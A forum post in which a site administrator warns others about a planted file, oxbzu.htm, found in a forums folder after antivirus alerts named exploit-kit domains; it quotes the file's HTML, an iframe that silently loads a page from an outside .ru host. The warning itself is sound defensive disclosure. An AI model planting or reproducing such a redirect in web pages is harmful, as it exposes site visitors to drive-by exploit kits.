Check your forums folder for this exploit
Noticing a lot of spam registrations that are successfully creating users, when I killed off via IP Deny in CPanel a bunch of Russian IP address have managed to stop them (yes I know about cloaking etc but it has worked).
Anyway, have just recently noticed that when opening up the admin panel my Norton Anti Virus starts showing that its blocking attacks. 3 attacks simultaneously..
Exploit Kit variant 7 via Kokosina.in, Blackhole toolkit Website 5 via icoriggermonitor.com and Malicious toolkit Website 9 via edgepub.osa.pl
Through various checks have managed to track down an offending file that sits under my forums folder named oxbzu.htm
And it contains the following redirect.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>You are redirecting...</title> </head> <body> <iframe src="http://coredret.ru/main.php" width="468" height="400" align="left"> Wait please...! </iframe> </body> </html>
So, if anything is up on your site you might want to take a look.
|